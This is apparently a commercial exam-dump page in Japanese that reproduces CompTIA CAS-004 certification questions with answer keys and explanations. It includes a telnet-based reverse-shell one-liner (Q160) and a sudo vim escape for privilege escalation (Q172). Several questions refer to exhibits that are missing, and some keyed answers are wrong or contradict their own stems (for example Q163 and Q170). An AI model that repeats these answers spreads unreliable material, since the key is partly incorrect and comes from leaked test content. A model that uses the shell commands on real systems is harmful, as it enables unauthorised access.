最新の2024年05月16日試験エンジン練習問題CAS-004最新の有効問題集を提供中です
試験解答はCAS-004最新版テストエンジンをタダで提供します
質問 # 158
A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:
Which of the following ciphers should the security analyst remove to support the business requirements?
- A. TLS_AES_128_CCM_8_SHA256
- B. TLS_DHE_DSS_WITH_RC4_128_SHA
- C. TLS_AES_128_GCM_SHA256
- D. TLS_CHACHA20_POLY1305_SHA256
正解:B
質問 # 159
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
- A. Physical destruction
- B. Purging
- C. Degaussing
- D. Drive wiping
正解:A
解説:
Physical destruction is the best method to ensure no data remnants can be recovered. Drive wiping, degaussing, and purging are all methods of data erasure, but they may not be able to completely erase all data remnants. Physical destruction is the only method that can guarantee no data remains.
質問 # 160
A penetration tester inputs the following command:
telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344
This command will allow the penetration tester to establish a:
- A. network pivot.
- B. port mirror.
- C. proxy chain.
- D. reverse shell.
正解:D
解説:
The command creates a connection to the remote host 192.168.99.254 on port 343, runs the command /bin/bash, and pipes the output to another connection to the same host on port 344.
This creates a reverse shell connection from the remote host to the attacker's machine, allowing the attacker to execute commands on the remote host from their own system.
質問 # 161
During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost.
Which of the following should the security analyst have followed?
- A. Verification
- B. Chain of custody
- C. Order of volatility
- D. Secure storage
正解:C
解説:
Order of volatility is a procedure that a computer forensics examiner must follow during evidence collection. It refers to the order in which digital evidence is collected, starting with the most volatile and moving to the least volatile. Volatile data is data that is not permanent and is easily lost, such as data in memory when you turn off a computer. The security analyst should have followed the order of volatility to preserve the most fragile evidence first, such as the malicious script running as a background process, before turning off the infected machine. Verified References:
https://www.computer-forensics-recruiter.com/order-of-volatility/
https://www.sans.org/blog/best-practices-in-digital-evidence-collection/
https://blogs.getcertifiedgetahead.com/order-of-volatility/
質問 # 162
A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access. Which of the following risk techniques did the department use in this situation?
- A. Mitigate
- B. Avoid
- C. Transfer
- D. Accept
正解:A
質問 # 163
The code snippet below controls all electronic door locks to a secure facility in which the doors should only fail open in an emergency. In the code, "criticalValue" indicates if an emergency is underway:
Which of the following is the BEST course of action for a security analyst to recommend to the software developer?
- A. Add additional exception handling logic to the main program to prevent doors from being opened
- B. Rewrite the software's exception handling routine to fail in a secure state
- C. Apply for a life-safety-based risk exception allowing secure doors to fail open
- D. Rewrite the software to implement fine-grained, conditions-based testing
正解:A
質問 # 164
Ransomware encrypted the entire human resources fileshare for a large financial institution.
Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?
- A. Leave the current backup schedule intact and make the human resources fileshare read-only.
- B. Decrease the frequency of backups and pay the ransom to decrypt the data.
- C. Leave the current backup schedule intact and pay the ransom to decrypt the data.
- D. Increase the frequency of backups and create SIEM alerts for IOCs.
正解:D
解説:
It is not advisable to pay the ransom in a ransomware attack, as this only encourages the attackers and does not guarantee that the data will actually be decrypted. Instead, the management team should consider increasing the frequency of backups to meet the RPO requirements for the human resources fileshare. Additionally, implementing SIEM alerts for indicators of compromise (IOCs) can help to detect and prevent future ransomware attacks.
質問 # 165
A security analyst is investigating a possible buffer overflow attack. The following output was found on a user's workstation:
graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments?
- A. DEP
- B. HSM
- C. ASLR
- D. NX bit
正解:C
解説:
The keyword is {the manipulation of memory segments} ASLR prevents that by randomizing memory location. NX bit, ASLR, and DEP all help with buffer overflow but only ASLR handles randomization.
質問 # 166
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.
Based on the output above, from which of the following process IDs can the analyst begin an investigation?
- A. 0
- B. 1
- C. 2
- D. 3
正解:C
質問 # 167
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements:
Only users with corporate-owned devices can directly access servers hosted by the cloud provider.
The company can control what SaaS applications each individual user can access.
User browser activity can be monitored.
Which of the following solutions would BEST meet these requirements?
- A. SSL tunnel, DLP, and host-based firewall
- B. VPN, CASB, and secure web gateway
- C. API gateway, UEM, and forward proxy
- D. IAM gateway, MDM, and reverse proxy
正解:B
解説:
Explanation
A VPN (virtual private network) can provide secure connectivity for remote users to access servers hosted by the cloud provider. A CASB (cloud access security broker) can enforce policies and controls for accessing SaaS applications. A secure web gateway can monitor and filter user browser activity to prevent malicious or unauthorized traffic. Verified References:
https://partners.comptia.org/docs/default-source/resources/casp-content-guide
https://www.comptia.org/blog/what-is-a-vpn
質問 # 168
An electric car company hires an IT consulting company to improve the cybersecurity of us vehicles.
Which of the following should achieve the BEST long-term result for the company?
- A. Designing Developing add-on security components for fielded vehicles
- B. Reviewing and influencing requirements for an early development vehicle
- C. Reviewing proposed designs and prototypes for cybersecurity vulnerabilities
- D. Performing a cyber-risk assessment on production vehicles
正解:C
質問 # 169
A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively?
- A. Use OSINT techniques to evaluate and analyze the threats.
- B. Join an information-sharing community that is relevant to the company.
- C. Leverage the MITRE ATT&CK framework to map the TTR.
- D. Update security awareness training to address new threats, such as best practices for data security.
正解:B
解説:
An information-sharing community is a group or network of organizations that share threat intelligence, best practices, and mitigation strategies related to cybersecurity. An information-sharing community can help the company proactively manage the threats of potential theft of its newly developed, proprietary information by providing timely and actionable insights, alerts, and recommendations. An information-sharing community can also enable collaboration and coordination among its members to enhance their collective defense and resilience. Reference: https://us-cert.cisa.gov/ncas/tips/ST04-016 https://www.cisecurity.org/blog/what-is-an-information-sharing-community/
質問 # 170
An analyst execute a vulnerability scan against an internet-facing DNS server and receives the following report:
- Vulnerabilities in Kernel-Mode Driver Could Allow Elevation of
Privilege
- SSL Medium Strength Cipher Suites Supported
- Vulnerability in DNS Resolution Could Allow Remote Code Execution
- SMB Host SIDs allows Local User Enumeration
Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?
- A. Port scanner
- B. Exploitation framework
- C. Account enumerator
- D. Password cracker
正解:D
質問 # 171
A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution?
- A. Update the organization's group policy.
- B. Develop an Nmap plug-in to detect the indicator of compromise.
- C. Include the signature in the vulnerability scanning tool.
- D. Deliver an updated threat signature throughout the EDR system
正解:D
解説:
Delivering an updated threat signature throughout the endpoint detection and response (EDR) system is the best way to take advantage of the security solution that uses a sandbox environment to execute zero-day software and collect indicators of compromise. An EDR system is a solution that monitors and analyzes the activities and behaviors of endpoints, such as computers, mobile devices, or servers, and detects and responds to potential threats. An EDR system can use threat signatures, which are patterns or characteristics of known malicious software or attacks, to identify and block malicious activities on endpoints. By delivering an updated threat signature based on the indicators of compromise collected from the sandbox environment, the organization can enhance its EDR system's ability to detect and prevent zero-day attacks that exploit unknown vulnerabilities. Verified References:
https://www.cisco.com/c/en/us/products/security/what-is-endpoint-detection-response.html
https://www.crowdstrike.com/epp-101/what-is-a-sandbox/
質問 # 172
During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels.
Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?
- A. Spawn a shell using sudo and an escape string such as sudo vim -c '!sh'.
- B. Perform ASIC password cracking on the host.
- C. Initiate unquoted service path exploits.
- D. Use the UNION operator to extract the database schema.
- E. Read the /etc/passwd file to extract the usernames.
正解:A
解説:
Reference:
Spawning a shell using sudo and an escape string is a valid Linux post-exploitation method that can exploit a misconfigured sudoers file and allow a standard user to execute commands as root. ASIC password cracking is used to break hashed passwords, not to elevate privileges. Reading the /etc/passwd file may reveal usernames, but not passwords or privileges. Unquoted service path exploits are applicable to Windows systems, not Linux. Using the UNION operator is a SQL injection technique, not a Linux post-exploitation method. Verified Reference: https://www.comptia.org/blog/what-is-post-exploitation https://partners.comptia.org/docs/default-source/resources/casp-content-guide
質問 # 173
A security architect Is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been Implemented to prevent these types of risks?
- A. Supply chain visibility
- B. Code reviews
- C. Software audits
- D. Source code escrows
正解:D
解説:
Explanation
A source code escrow is a legal agreement that involves a third party holding the source code of a software application on behalf of the software vendor and the software licensee. The source code escrow ensures that the licensee can access the source code in case the vendor goes out of business, fails to provide maintenance or support, or breaches the contract terms.
A source code escrow would have prevented the risk of having an old application that is not covered for maintenance anymore because the software company is no longer in business, because it would:
Allow the licensee to obtain the source code and continue to update, fix, or modify the application according to their needs.
Protect the vendor's intellectual property rights and prevent unauthorized disclosure or use of the source code.
Provide a legal framework and a trusted mediator for resolving any disputes or issues between the vendor and the licensee.
質問 # 174
A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead. The network comprises three VLANs:
The security engineer looks at the UTM firewall rules and finds the following:
Which of the following should the security engineer do to ensure IMAPS functions properly on the corporate user network?
- A. Make sure the UTM certificate is imported on the corporate computers.
- B. Confirm the email server certificate is installed on the corporate computers.
- C. Contact the email service provider and ask if the company IP is blocked.
- D. Create an IMAPS firewall rule to ensure email is allowed.
正解:D
質問 # 175
......
この試験は、候補者が様々な環境で安全なソリューションを概念化、設計、実装する能力をテストするように設計されています。これは、サイバーセキュリティの概念、技術、およびプラクティスについての徹底的な理解を必要とする上級レベルの認定試験です。また、候補者のセキュリティインシデントや脆弱性に対する分析および対応能力をテストするようにも設計されています。
CAS-004試験問題集で無料サンプルは365日更新されます:https://jp.fast2test.com/CAS-004-premium-file.html
合格させるCAS-004試験問題と最新のCAS-004テスト問題集PDF:https://drive.google.com/open?id=1kyH5rkirsjNpGLctVrG9DAOqODK1gwN-